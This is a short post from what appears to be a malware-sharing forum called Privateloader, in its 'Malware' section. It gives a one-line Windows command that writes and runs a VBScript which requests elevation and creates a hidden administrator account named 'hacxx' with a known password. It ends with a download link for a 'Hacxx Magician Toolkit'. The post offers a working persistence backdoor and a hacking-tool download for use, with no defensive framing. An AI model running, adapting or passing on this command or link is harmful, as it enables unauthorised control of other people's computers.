UAC - Add an Admin Account on Windows with one line - Afdrukversie +- Privateloader (http://www.privateloader.freebb.be) +-- Forum: Privateloader Online (/forum-1.html) +--- Forum: Malware (/forum-4.html) +--- Discussie: UAC - Add an Admin Account on Windows with one line (/thread-205.html) |
UAC - Add an Admin Account on Windows with one line - electrify - 12-16-2022 11:52 PM Code: cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs Download: Hacxx Magician Toolkit Update 3 https://filecrypt.cc/Container/B94F04A70D.html |